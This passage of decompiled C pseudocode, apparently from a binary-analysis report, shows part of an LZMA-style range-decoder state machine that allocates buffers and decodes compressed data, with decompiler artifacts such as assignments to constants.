                                                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											 *(_t612 - 0x74) = _t546;
                                                          											if( *(_t612 - 8) != 0) {
                                                          												GlobalFree( *(_t612 - 8));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                          											 *(_t612 - 8) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                          											 *(_t612 - 0x84) = 6;
                                                          											 *(_t612 - 0x4c) = _t553;
                                                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                          											goto L132;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t612 - 0x6c);
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											_t67 = _t612 - 0x70;
                                                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                          											if( *(_t612 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t531 =  *_t605;
                                                          											_t588 = _t531 & 0x0000ffff;
                                                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                          											if( *(_t612 - 0xc) >= _t564) {
                                                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                          												 *(_t612 - 0x40) = 1;
                                                          												_t532 = _t531 - (_t531 >> 5);
                                                          												__eflags = _t532;
                                                          												 *_t605 = _t532;
                                                          											} else {
                                                          												 *(_t612 - 0x10) = _t564;
                                                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                          											}
                                                          											if( *(_t612 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											} else {
                                                          												goto L137;
                                                          											}
                                                          										case 5:
                                                          											L137:
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 5;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                          											L139:
                                                          											_t533 =  *(_t612 - 0x84);
                                                          											goto L140;
                                                          										case 6:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											goto L132;
                                                          										case 8:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xa;
                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x38);
                                                          												__ecx =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                          												 *(__ebp - 0x84) = 9;
                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          											}
                                                          											goto L132;
                                                          										case 9:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L90;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t259;
                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          											goto L76;
                                                          										case 0xa:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L89;
                                                          										case 0xb:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L89:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L90:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L100:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t335 = __ebp - 0x70;
                                                          											 *_t335 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t335;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L102;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L110:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t366 = __ebp - 0x70;
                                                          											 *_t366 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t366;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											goto L112;
                                                          										case 0x11:
                                                          											L69:
                                                          											__esi =  *(__ebp - 0x58);
                                                          											 *(__ebp - 0x84) = 0x12;
                                                          											L132:
                                                          											 *(_t612 - 0x54) = _t605;
                                                          											goto L133;
                                                          										case 0x12:
                                                          											goto L0;
                                                          										case 0x13:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												_t469 = __ebp - 0x58;
                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          												__eflags =  *_t469;
                                                          												 *(__ebp - 0x30) = 0x10;
                                                          												 *(__ebp - 0x40) = 8;
                                                          												goto L144;
                                                          											}
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											 *(__ebp - 0x30) = 8;
                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          											goto L130;
                                                          										case 0x14:
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          											__eax =  *(__ebp - 0x80);
                                                          											L140:
                                                          											 *(_t612 - 0x88) = _t533;
                                                          											goto L1;
                                                          										case 0x15:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          											__al = __al & 0x000000fd;
                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          											goto L121;
                                                          										case 0x16:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__eflags = __eax - 4;
                                                          											if(__eax >= 4) {
                                                          												_push(3);
                                                          												_pop(__eax);
                                                          											}
                                                          											__ecx =  *(__ebp - 4);
                                                          											 *(__ebp - 0x40) = 6;
                                                          											__eax = __eax << 7;
                                                          											 *(__ebp - 0x7c) = 0x19;
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											goto L145;
                                                          										case 0x17:
                                                          											goto L145;
                                                          										case 0x18:
                                                          											L146:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x18;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t484 = __ebp - 0x70;
                                                          											 *_t484 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t484;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L148:
                                                          											_t487 = __ebp - 0x48;
                                                          											 *_t487 =  *(__ebp - 0x48) - 1;
                                                          											__eflags =  *_t487;
                                                          											goto L149;
                                                          										case 0x19:
                                                          											__eflags = __ebx - 4;
                                                          											if(__ebx < 4) {
                                                          												 *(__ebp - 0x2c) = __ebx;
                                                          												L120:
                                                          												_t394 = __ebp - 0x2c;
                                                          												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                          												__eflags =  *_t394;
                                                          												L121:
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          													goto L170;
                                                          												}
                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                          													goto L171;
                                                          												}
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          												__eax =  *(__ebp - 0x30);
                                                          												_t401 = __ebp - 0x60;
                                                          												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          												__eflags =  *_t401;
                                                          												goto L124;
                                                          											}
                                                          											__ecx = __ebx;
                                                          											__eax = __ebx;
                                                          											__ecx = __ebx >> 1;
                                                          											__eax = __ebx & 0x00000001;
                                                          											__ecx = (__ebx >> 1) - 1;
                                                          											__al = __al | 0x00000002;
                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                          											__eflags = __ebx - 0xe;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ebx >= 0xe) {
                                                          												__ebx = 0;
                                                          												 *(__ebp - 0x48) = __ecx;
                                                          												L103:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__eax = __eax + __ebx;
                                                          													 *(__ebp - 0x40) = 4;
                                                          													 *(__ebp - 0x2c) = __eax;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                          													__eflags = __eax;
                                                          													L109:
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													 *(__ebp - 0x50) = 1;
                                                          													 *(__ebp - 0x44) = 0;
                                                          													 *(__ebp - 0x48) = 0;
                                                          													L113:
                                                          													__eax =  *(__ebp - 0x40);
                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          														_t392 = __ebp - 0x2c;
                                                          														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                          														__eflags =  *_t392;
                                                          														goto L120;
                                                          													}
                                                          													__eax =  *(__ebp - 0x50);
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__esi = __edi + __eax;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__ax =  *__esi;
                                                          													__ecx = __ax & 0x0000ffff;
                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                          														__ecx = 0;
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          														__ecx = 1;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          														__ebx = 1;
                                                          														__ecx =  *(__ebp - 0x48);
                                                          														__ebx = 1 << __cl;
                                                          														__ecx = 1 << __cl;
                                                          														__ebx =  *(__ebp - 0x44);
                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                          														__cx = __ax;
                                                          														__cx = __ax >> 5;
                                                          														__eax = __eax - __ecx;
                                                          														__edi = __edi + 1;
                                                          														__eflags = __edi;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          														 *__esi = __ax;
                                                          														 *(__ebp - 0x50) = __edi;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __edx;
                                                          														0x800 = 0x800 - __ecx;
                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          														 *__esi = __dx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L112:
                                                          														_t369 = __ebp - 0x48;
                                                          														 *_t369 =  *(__ebp - 0x48) + 1;
                                                          														__eflags =  *_t369;
                                                          														goto L113;
                                                          													} else {
                                                          														goto L110;
                                                          													}
                                                          												}
                                                          												__ecx =  *(__ebp - 0xc);
                                                          												__ebx = __ebx + __ebx;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          													__ecx =  *(__ebp - 0x10);
